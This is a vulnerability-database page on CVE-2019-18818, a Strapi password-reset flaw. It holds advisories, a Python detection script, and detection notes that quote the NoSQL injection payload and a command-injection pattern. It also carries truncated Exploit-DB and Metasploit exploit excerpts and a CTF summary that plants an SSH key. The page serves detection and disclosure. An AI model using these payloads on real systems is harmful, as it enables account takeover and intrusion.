CVE-2019-18818
Published: 2019-11-07
Priority: P188 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Status: exploited in the wild · VulnCheck KEV · Initial access
EPSS: 97.64% (99.9th percentile)
strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| strapi | strapi | <= 1.6.4 | — |
| strapi | strapi | — | — |
| strapi | strapi | >= 0 < 3.0.0-beta.17.5 | 3.0.0-beta.17.5 |
Detection & IOCs (extracted from sources)
- command: `{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}`
- yara: matchers on POST /admin/auth/reset-password with body containing '"username":' AND '"email":' AND '"jwt":' and HTTP 200
- Detect unauthenticated password reset exploitation by monitoring POST requests to /admin/auth/reset-password containing a JSON body with a NoSQL injection operator in the 'code' field (e.g., {"$gt": 0} or an empty object {}).
- A successful exploit response from /admin/auth/reset-password returns HTTP 200 with a JSON body containing 'jwt', 'username', and 'email' fields; monitor for this response pattern as confirmation of compromise.
- After the password reset, watch for POST requests to /admin/plugins/install with a 'plugin' field containing shell command injection patterns (e.g., 'documentation && $(cmd)'), indicating chained exploitation with CVE-2019-19609.
- The Metasploit auxiliary module for this CVE targets /admin/auth/reset-password via POST with Content-Type application/json and a JSON body containing 'code': {'$gt': 0}; detection should alert on this NoSQL operator in JSON POST bodies to Strapi admin endpoints.
- The exploit also works with an empty object '{}' as the 'code' value (not just '$gt': 0), so detection rules must account for both variants of the NoSQL injection payload.
- The vulnerability affects Strapi versions starting with '3.0.0-beta' and '3.0.0-alpha'; version checks against /admin/init or /admin/strapiVersion should be used to scope detection to vulnerable instances only.
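As an added example (not code from the page's sources or from any of the tools listed on it), the detection guidance above as runnable Python: it scopes by Strapi pre-release version (older than 3.0.0-beta.17.5 rather than the coarser prefix check), flags reset-password POST bodies whose `code` is an object (the `{}` and `{"$gt": 0}` variants, generalized to any `$`-operator key) or otherwise not a string, and confirms compromise from a 200 response carrying jwt, username and email. The sample traffic at the end is constructed.

```python
import json
import re
from urllib.parse import urlsplit

RESET_PATH = "/admin/auth/reset-password"

def version_is_vulnerable(version):
    """True for Strapi 3.0.0-alpha.* / 3.0.0-beta.* builds older than 3.0.0-beta.17.5."""
    m = re.fullmatch(r"3\.0\.0-(alpha|beta)((?:\.\d+)*)", version.strip())
    if not m:
        return False  # stable releases and other lines are outside the affected range
    key = (m.group(1),) + tuple(int(p) for p in m.group(2).split(".") if p)
    return key < ("beta", 17, 5)  # "alpha" sorts before "beta"; parts compare as ints

def request_is_suspicious(method, path, body):
    """Flag a reset-password POST whose 'code' is not the expected string token."""
    if method.upper() != "POST" or urlsplit(path).path != RESET_PATH:
        return False
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return False
    if not isinstance(data, dict) or "code" not in data:
        return False
    code = data["code"]
    if isinstance(code, dict):  # both variants: empty object {} or any "$operator" key
        return not code or any(str(k).startswith("$") for k in code)
    return not isinstance(code, str)  # numbers, lists, null: also not a reset token

def response_confirms_compromise(status, body):
    """HTTP 200 carrying jwt, username and email means the reset went through."""
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return False
    return status == 200 and isinstance(data, dict) and {"jwt", "username", "email"} <= set(data)

def triage(method, path, req_body, status, resp_body):
    """Return None, 'attempt' or 'compromise' for one request/response pair."""
    if not request_is_suspicious(method, path, req_body):
        return None
    return "compromise" if response_confirms_compromise(status, resp_body) else "attempt"

# Constructed sample traffic (not real logs): benign reset, failed attempt, successful attempt.
SAMPLE = [
    ("POST", RESET_PATH, '{"code": "a3f1c9", "password": "x", "passwordConfirmation": "x"}', 400, "{}"),
    ("POST", RESET_PATH, '{"code": {}, "password": "x", "passwordConfirmation": "x"}', 400, "{}"),
    ("POST", RESET_PATH, '{"code": {"$gt": 0}, "password": "x", "passwordConfirmation": "x"}', 200,
     '{"jwt": "<token>", "username": "admin", "email": "admin@example.com"}'),
]
```

Running `[triage(*e) for e in SAMPLE]` yields `[None, 'attempt', 'compromise']`; feed it request/response pairs from a reverse-proxy or WAF log to apply the same logic in bulk.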
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
Strapi allows unauthenticated attacker to reset admin password without valid reset token
ghsa · 2019-12-02 · CVE-2019-18818 [CRITICAL] · CWE-640
Versions of `strapi` prior to 3.0.0-beta.17.5 are vulnerable to Privilege Escalation. The password reset routes allow an unauthenticated attacker to reset an admin's password without providing a valid password reset token.
## Recommendation
Upgrade to version 3.0.0-beta.17.5 or later.
OSV
Strapi allows unauthenticated attacker to reset admin password without valid reset token
osv · 2019-12-02 · CVE-2019-18818 [CRITICAL]
Versions of `strapi` prior to 3.0.0-beta.17.5 are vulnerable to Privilege Escalation. The password reset routes allow an unauthenticated attacker to reset an admin's password without providing a valid password reset token.
## Recommendation
Upgrade to version 3.0.0-beta.17.5 or later.
VulnCheck
strapi strapi Weak Password Recovery Mechanism for Forgotten Password
vulncheck · 2019 · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Affected: strapi strapi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-18818; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2019-18818; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2019-18818; https://dashboa
No detection rules found.
Exploit-DB
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)
exploitdb · 2022-02-08 · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule "Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",
      'Description' => %q{
        This exploit module abuses the mishandling of password reset in JSON for Strapi CMS version 3.0.0-beta.17.4 to change the password of a privileged user.
      },
      'License' => MSF_LICENSE,
      'Author' => [ 'WackyH4cker' ],
      'References' =>
        [
          [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ]
        ],
      'Platform' => 'linux',
      'Targets' => [
        [ 'Strapi 3.0.0-beta-17.4', {} ]
      ],
      'Payload' => '',
      'Privileged' => true,
      'DisclosureDate' => "",
      'DefaultOptions' =>
```
Exploit-DB
Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
exploitdb · 2021-08-30 · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
---
```python
# Exploit Title: Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-08-30
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://strapi.io/
# Software Link: https://strapi.io/
# Version: Strapi CMS version 3.0.0-beta.17.4 or lower
# Tested on: Ubuntu 20.04
# CVE : CVE-2019-18818, CVE-2019-19609
#!/usr/bin/env python3
import requests
import json
from cmd import Cmd
import sys
if len(sys.argv) != 2:
    print("[-] Wrong number of arguments provided")
    print("[*] Usage: python3 exploit.py \n")
    sys.exit()
class Terminal(Cmd):
    prompt = "$> "
    def default(self, args):
        code_exec(args)
def check_version():
    global url
    print("[+] Checking Strapi CMS Version running")
    version = requ
```
Exploit-DB
Strapi 3.0.0-beta - Set Password (Unauthenticated)
exploitdb · 2021-08-30 · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
---
```python
# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818
#!/usr/bin/python
import requests
import sys
import json
userEmail = "[email protected]"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"
s = requests.Session()
# Get strapi version
strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)
print("[*] strapi version: {}".format(strapiVersion["strapiVersion"]))
# Validate vulnerable version
if strapiVersion["strapiVersion"].startswith('3.0.0-beta') or strapiVersion["strapiVersion"].startswith('3.0.0-alpha'):
    # Password
```
Nuclei
strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
nuclei · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Template:
```yaml
id: CVE-2019-18818
info:
  name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
  author: idealphase
  severity: critical
  description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
  impact: |
    An attacker can exploit this vulnerability to reset the admin password and gain unauthorized access to the Strapi CMS admin panel.
  remediation: |
    Upgrade Strapi
```
Metasploit
Strapi CMS Unauthenticated Password Reset
metasploit
This module abuses the mishandling of a password reset request for Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user. Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
CTF
medium / README
ctf_writeups · CVSS 9.1 · [CRITICAL]
CTF
Horizontall / README
ctf_writeups · CVSS 9.8 · CVE-2019-18818 [CRITICAL]
# Horizontall - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## TL;DR
To solve this machine, we begin by enumerating open services using ```nmap```, finding ports ```22``` and ```80```.
***User***: Found the subdomain ```api-prod``` in one of the JavaScript files. By enumerating the subdomain we found the login page of a ```Strapi``` system. We reset the ```admin``` password using ```CVE-2019-18818``` and, using the same exploit, write our SSH public key to the ```/opt/strapi/.ssh/authorized_keys``` directory, which allows us to log in with our SSH private key and get a shell as the ```strapi``` user.
***Root***: Found a local service on port ```8000``` (running as ```root```) which is a ```Laravel``` system. Using ```CVE-2021-3129``` we write our SSH public key to ```/root/.ssh/authorized_keys
CTF
easy / README
ctf_writeups · CVSS 6.0 · [MEDIUM]
References
- http://packetstormsecurity.com/files/163939/Strapi-3.0.0-beta-Authentication-Bypass.html
- http://packetstormsecurity.com/files/163950/Strapi-CMS-3.0.0-beta.17.4-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/165896/Strapi-CMS-3.0.0-beta.17.4-Privilege-Escalation.html
- https://github.com/strapi/strapi/pull/4443
- https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
- https://www.npmjs.com/advisories/1311